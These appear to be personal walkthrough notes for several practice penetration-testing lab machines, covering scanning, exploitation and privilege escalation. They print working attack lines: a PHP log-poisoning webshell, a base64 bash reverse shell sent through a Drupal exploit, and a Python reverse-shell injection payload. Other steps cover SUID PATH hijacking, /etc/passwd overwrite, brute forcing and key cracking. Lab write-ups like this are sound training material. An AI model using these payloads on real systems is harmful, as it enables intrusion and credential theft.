:::spoiler
[toc]
:::

# Solstice

```bash
┌──(root㉿G)-[/home/kali]
└─# nmap -sS -Pn 192.168.178.72 -p- -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:27 CST
Warning: 192.168.178.72 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.178.72
Host is up (0.078s latency).
Not shown: 64952 closed tcp ports (reset), 574 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
2121/tcp  open  ccproxy-ftp
3128/tcp  open  squid-http
8593/tcp  open  unknown
54787/tcp open  unknown
62524/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 428.63 seconds
```

There are several unknown services, so run a more detailed service identification on just those ports:

```bash
┌──(root㉿G)-[/home/kali]
└─# nmap -sS -Pn 192.168.178.72 -p21,22,25,80,2121,3128,8593,54787,62524 -T5 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:44 CST
Nmap scan report for 192.168.178.72
Host is up (0.080s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        pyftpdlib 1.5.6
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.178.72:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
|   256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_  256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp    open  smtp       Exim smtpd 4.92
| smtp-commands: solstice Hello nmap.scanme.org [192.168.45.199], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
2121/tcp  open  ftp        pyftpdlib 1.5.6
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.178.72:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------   2 www-data www-data     4096 Jun 18  2020 pub
3128/tcp  open  http-proxy Squid http proxy 4.6
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.6
8593/tcp  open  http       PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
54787/tcp open  http       PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
62524/tcp open  ftp        FreeFloat ftpd 1.00
Service Info: Host: solstice; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds
```

The site on port 80 has nothing worth attacking; the site on port 8593 can be taken from LFI to RCE. While trying things, `/var/log/apache2/access.log` turned out to be readable, so I edited the request to inject PHP code into the log: `<?php echo system($_GET['cmd']); ?>`

The box had issues......

# Inclusiveness

Ports 21, 22 and 80 are open, and FTP allows anonymous login.

```bash
┌──(root㉿G)-[/tmp]
└─# nmap -sS -Pn -sC 192.168.243.14 --top-ports=15 -T5 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 20:58 CST
Nmap scan report for 192.168.243.14
Host is up (0.078s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.45.154
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open   ssh           OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed domain
80/tcp   open   http          Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
110/tcp  closed pop3
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
8080/tcp closed http-proxy
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
```

After logging in there are no files at all, only one directory, but it turns out we are allowed to upload files there.

```bash
┌──(kali㉿G)-[/tmp]
└─$ ftp Anonymous@192.168.243.14
Connected to 192.168.243.14.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||13394|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Feb 08  2020 .
drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||17063|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Feb 08  2020 .
drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
226 Directory send OK.
ftp>
```

On the web side I found the `/manual` directory.

![image](https://hackmd.io/_uploads/SJtYpiraC.png)

Nothing else looked useful, so I went to `/robots.txt`; the site answers `You are not a search engine! You can't read my robots.txt!`. Requesting it with a different User-Agent reveals our target directory:

```bash
┌──(kali㉿G)-[/tmp]
└─$ curl http://192.168.243.14/robots.txt --user-agent GoogleBot
User-agent: *
Disallow: /secret_information/
```

The site's `?lang=` parameter can be changed for a working LFI.

![image](https://hackmd.io/_uploads/rkrIAsB6A.png)

Upload php-reverse-shell.php straight over FTP, then include `/var/ftp/pub/php-reverse-shell.php` through the LFI to get RCE.

![image](https://hackmd.io/_uploads/ryWhWhrT0.png)

For privilege escalation there are two odd files:

```bash
-rwsr-xr-x 1 root root 16976 Feb  8  2020 rootshell
-rw-r--r-- 1 tom  tom    448 Feb  8  2020 rootshell.c
www-data@inclusiveness:/home/tom$ cat rootshell.c
cat rootshell.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {
    printf("checking if you are tom...\n");
    FILE* f = popen("whoami", "r");
    char user[80];
    fgets(user, 80, f);
    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());
    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);
    }
}
www-data@inclusiveness:/home/tom$
```

Since the SUID binary resolves `whoami` through the environment, we can change `PATH` so that `whoami` is whatever we want it to be:

```bash
www-data@inclusiveness:/home/tom$ echo 'echo tom' > whoami
echo 'echo tom' > whoami
bash: whoami: Permission denied
www-data@inclusiveness:/home/tom$ cd /tmp
cd /tmp
www-data@inclusiveness:/tmp$ echo "echo tom" > whoami
echo "echo tom" > whoami
www-data@inclusiveness:/tmp$ chmod +x whoami
chmod +x whoami
www-data@inclusiveness:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@inclusiveness:/tmp$ /home/tom/rootshell
/home/tom/rootshell
checking if you are tom...
you are: tom

access granted.
# cat /root/proof.txt
cat /root/proof.txt
8d3f0387251383abb846c12482691bbb
# ^C
```

# EvilBox-One

Ports 22 and 80 are open. This box really tests fuzzing technique: the site is the Apache2 Debian default page. First I found the `/secret` directory, then fuzzed out `evil.php`.

```bash
┌──(kali㉿G)-[/tmp]
└─$ gobuster dir -u http://192.168.155.212/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.155.212/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,aspx,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 4]
/.php                 (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]
Progress: 55845 / 882244 (6.33%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 55875 / 882244 (6.33%)
===============================================================
Finished
===============================================================
```

But the page is still just a blank white page.

![image](https://hackmd.io/_uploads/rJ1J3746C.png)

Keep fuzzing: the parameter is `command`.

```bash
┌──(kali㉿G)-[~]
└─$ ffuf -u http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirb/big.txt -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 76ms]
:: Progress: [20469/20469] :: Job [1/1] :: 536 req/sec :: Duration: [0:00:47] :: Errors: 0 ::
```

Reading `/etc/passwd` shows the user mowree, so next I read `/home/mowree/.ssh/id_rsa`:

```bash
┌──(kali㉿G)-[~]
└─$ curl http://192.168.155.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
```

Logging in with `id_rsa` directly doesn't work; the key needs a passphrase.

```bash
┌──(kali㉿G)-[/tmp]
└─$ ssh mowree@192.168.155.212 -i id_rsa
The authenticity of host '192.168.155.212 (192.168.155.212)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.155.212' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
```

`ssh2john` plus john cracks the passphrase: unicorn.

```bash
┌──(kali㉿G)-[/tmp]
└─$ ssh2john id_rsa > hash

┌──(kali㉿G)-[/tmp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)
1g 0:00:00:00 DONE (2024-09-15 17:55) 33.33g/s 42666p/s 42666c/s 42666C/s ramona..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

For privilege escalation, we have write access to `/etc/passwd`, so just set a new root password:

```bash
mowree@EvilBoxOne:~$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 1398 ago 16  2021 /etc/passwd
mowree@EvilBoxOne:~$ openssl passwd root
9kQPB8avNoXCg
```

Open `nano /etc/passwd` and change the root line to `root:9kQPB8avNoXCg:0:0:root:/root:/bin/bash`, then `su root` with the password `root` and we are `root`.

```bash
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
e4d485eacaf6c6d29c6fabec6c6f4968
root@EvilBoxOne:/home/mowree# exit
mowree@EvilBoxOne:~$ cerrar sesión
Connection to 192.168.155.212 closed.
```

# Monitoring

Ports 22, 25, 80 and 443 are open. The site is a Nagios XI page. A quick search gives the default username `nagiosadmin`; trying the weak password `admin` logs in.

![image](https://hackmd.io/_uploads/Hyt6z9zaA.png)

Its version, 5.6.0, has an [RCE](https://www.exploit-db.com/exploits/47299) exploit, and the shell it gives is already root.

```bash
┌──(kali㉿G)-[/tmp]
└─$ php 47299 --host=192.168.171.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.45.191 --reverseport=4444
[+] Grabbing NSP from: http://192.168.171.136/nagiosxi/login.php
[+] Retrieved page contents from: http://192.168.171.136/nagiosxi/login.php
[+] Extracted NSP - value: cb269f55b1f8dd0d6fc3b4c6abfff7ac92037953dd514a37790a1366cf7eec12
[+] Attempting to login...
[+] Authentication success
[+] Checking we have admin rights...
[+] Admin access confirmed
[+] Grabbing NSP from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php
[+] Retrieved page contents from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php
[+] Extracted NSP - value: e67bb311cc6c45ea6faf1a151d04567485e3a1812c3e4d85118276e427d71300
[+] Uploading payload...
[+] Payload uploaded
[+] Triggering payload: if successful, a reverse shell will spawn at 192.168.45.191:4444
```

```bash
┌──(kali㉿G)-[/tmp]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.171.136] 44100
bash: cannot set terminal process group (954): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cat /root/proof.txt
<osxi/html/includes/components/profile# cat /root/proof.txt
0b1ad11445f29d8979aeea8a165c0da2
```

![image](https://hackmd.io/_uploads/HkxvHqzaC.png)

# DC-1

Port scan first: ssh, http and rpc services are open. Opening the site shows Drupal. CHANGELOG.txt couldn't be read for the version, so it came down to trial and error. I happened to meet a Drupal RCE in the XX exam, so I fired the same [exploit](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py) at it:

```bash
┌──(kali㉿G)-[/tmp]
└─$ python3 exploit.py http://192.168.157.193/ -c "echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash"
============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)          |
|                                  by pimps                                |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-LMI8DwNIM7HoyAgcZyNaC7Nxt_a4-8CoiOScL1TnwbI
[*] Triggering exploit to execute: echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash
```

That gets local.txt.

![image](https://hackmd.io/_uploads/rJ1fNtF3C.png)

Then a simple [SUID privilege escalation](https://gtfobins.github.io/gtfobins/find/) using find opens a root shell.

![image](https://hackmd.io/_uploads/r19ertt3C.png)

```bash
┌──(kali㉿G)-[/tmp]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.171.118 mysql
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-13 22:17:29
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.171.118:3306/
[STATUS] 344.00 tries/min, 344 tries in 00:01h, 14344055 to do in 694:58h, 4 active
[STATUS] 335.33 tries/min, 1006 tries in 00:03h, 14343393 to do in 712:54h, 4 active
[STATUS] 338.71 tries/min, 2371 tries in 00:07h, 14342028 to do in 705:43h, 4 active
[STATUS] 340.07 tries/min, 5101 tries in 00:15h, 14339298 to do in 702:47h, 4 active
[3306][mysql] host: 192.168.171.118   login: root   password: prettywoman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-13 22:47:15
```

That finds `login: root password: prettywoman`. After logging in to MySQL, the table contents:

```bash
┌──(kali㉿G)-[/tmp]
└─$ mysql -u root -h 192.168.171.118 -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 7285
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| data               |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.081 sec)

MariaDB [(none)]> use data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| fernet         |
+----------------+
1 row in set (0.080 sec)

MariaDB [data]> select * from fernet;
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred                                                                                                                     | keyy                                         |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
1 row in set (0.083 sec)

MariaDB [data]>
```

After some digging I learned that Fernet is a symmetric encryption scheme; an [online tool](https://8gwifi.org/fernet.jsp) decrypts it.

![image](https://hackmd.io/_uploads/SJzfJCbaA.png)

`lucy:wJ9"Lemdv9\[FEw-`

SSH in and local is ours:

```bash
┌──(kali㉿G)-[~/Downloads]
└─$ ssh lucy@192.168.171.118 -p 1337
The authenticity of host '[192.168.171.118]:1337 ([192.168.171.118]:1337)' can't be established.
ED25519 key fingerprint is SHA256:K18aoM62L+/GHVzkZJScoh+S91IW1EPPvsc1K7UuVbE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.171.118]:1337' (ED25519) to the list of known hosts.
lucy@192.168.171.118's password:
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lucy@pyexp:~$ cat local.txt
.bash_history  .bash_logout  .bashrc  local.txt  .profile  user.txt
lucy@pyexp:~$ cat local.txt
879a9259b86d302aea312c4cdffc3929
lucy@pyexp:~$
```

Privilege escalation is easier: `sudo -l` shows `(root) NOPASSWD: /usr/bin/python2 /opt/exp.py`. Catting `/opt/exp.py` shows it clearly uses the dangerous function `exec` on user input, which is all we need:

```bash
lucy@pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py
lucy@pyexp:~$ cat /opt/exp.py
uinput = raw_input('how are you?')
exec(uinput)
lucy@pyexp:~$ sudo /usr/bin/python2 /opt/exp.py
how are you?__import__('os').system('/bin/bash')
root@pyexp:/home/lucy# cat /root/proof.txt
a7cafa73b9d0bc4db658cc924bd33167
root@pyexp:/home/lucy#
```

# SunsetDecoy

Port scan result: 22 and 80 open. The site serves a single zip file. Downloading it, the zip is password-protected; `zip2john` plus john cracks the password manuel. After unzipping there are passwd, shadow and so on.

![image](https://hackmd.io/_uploads/S15Kw_moA.png)

```bash
┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc]
└─$ ll
total 24
-rw-r--r-- 1 kali kali  829 Jun 28  2020 group
-rw-r--r-- 1 kali kali   33 Jun 28  2020 hostname
-rw-r--r-- 1 kali kali  185 Jun 28  2020 hosts
-rw-r--r-- 1 kali kali 1807 Jun 28  2020 passwd
-rw-r----- 1 kali kali 1111 Jul  8  2020 shadow
-r--r----- 1 kali kali  669 Feb  2  2020 sudoers

┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc]
└─$ unshadow passwd shadow > hash
```

`unshadow` plus john cracks user:296640a3b825115a47b68fc44501c828, password:server, and SSH login succeeds.
![image](https://hackmd.io/_uploads/SyXquO7sR.png)

```bash
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -al
total 56
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Aug 21 10:41 .
drwxr-xr-x 3 root                             root                              4096 Jun 27  2020 ..
lrwxrwxrwx 1 root                             root                                 9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   220 Jun 27  2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  3583 Jun 27  2020 .bashrc
-rwxr-xr-x 1 root                             root                             17480 Jul  7  2020 honeypot.decoy
-rw------- 1 root                             root                              1855 Jul  7  2020 honeypot.decoy.cpp
lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 id -> /bin/id
lrwxrwxrwx 1 root                             root                                13 Jun 27  2020 ifconfig -> /bin/ifconfig
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    33 Aug 21 09:57 local.txt
lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 ls -> /bin/ls
lrwxrwxrwx 1 root                             root                                10 Jun 27  2020 mkdir -> /bin/mkdir
-rwxr-xr-x 1 root                             root                               807 Jun 27  2020 .profile
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    66 Jun 27  2020 .selected_editor
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    32 Aug 27  2020 user.txt
```

This is a very restricted shell, so the box is testing restricted shell escaping. Running honeypot.decoy and choosing option 7 opens vim:

```bash
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.

1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:7
```

I looked up the vim editor commands and `:r local.txt` reads in local.txt. Afterwards I asked ChatGPT, which listed a few ways to escape the restriction:

```
Use a relative path or just the command name
ssh user@ip -t sh
Run a non-interactive command
ssh user@ip 'sh -c "your command"'
Try launching another, unrestricted shell
ssh user@ip -t bash
Escape rbash
ssh user@ip -t "bash --noprofile"
```

`-t sh` gives an unrestricted shell here, but I saw a better solution: inside the restricted environment, just add the usual directories to the PATH variable.

```bash
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

Damn, still couldn't get root; shelving this one.

# OnSystemShellDredd

Scanning the 20 most common ports shows only port 21 open, and it allows anonymous login.

![image](https://hackmd.io/_uploads/SydAILuYR.png)

After connecting with ftp, `ls` shows nothing; only after digging around did I notice the files start with a dot.

![image](https://hackmd.io/_uploads/H1GHuIdYC.png)

I downloaded `id_rsa`. Since the port scan so far showed no SSH service, I scanned all ports with `-p-`.

![image](https://hackmd.io/_uploads/BkR0d8_tA.png)

SSH in and the user flag is ours.

![image](https://hackmd.io/_uploads/Synv5I_FC.png)

After trying a few approaches, searching for SUID binaries and checking gtfobins showed that `mawk` can be used.

![image](https://hackmd.io/_uploads/S19asLdKC.png)

And finally the root flag.

![image](https://hackmd.io/_uploads/Bk9738uKA.png)

# Shakabrah

No port scan this time; from experience 22 and 80 will be open and I couldn't be bothered. The web page is plainly asking for command injection, which gives the user flag.

![image](https://hackmd.io/_uploads/BkC1KxFY0.png)

After that I spent about an hour on a reverse shell with no result, so I peeked at someone else's working reverse shell payload:

```python
; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.208",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
```

Once the connection arrives locally, first get a fully usable shell:

```python
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

`find / -perm -u=s 2>/dev/null` shows that vim is SUID, so `vim /root/proof.txt` gives the root flag directly. The vim here is really buggy; only after a lot of back and forth did I finally see the flag on a strange-looking screen.

![image](https://hackmd.io/_uploads/BJOlGmYFR.png)

# InfosecPrep

Port scan result: 22 and 80 open. An nmap NSE scan finds robots.txt disallowing `/secret`; that page is one big blob of base64 which decodes to an OpenSSH private key. Save it as `id_rsa`, `chmod 600` it, connect, and the user flag is ours.

![image](https://hackmd.io/_uploads/S1daO3tF0.png)

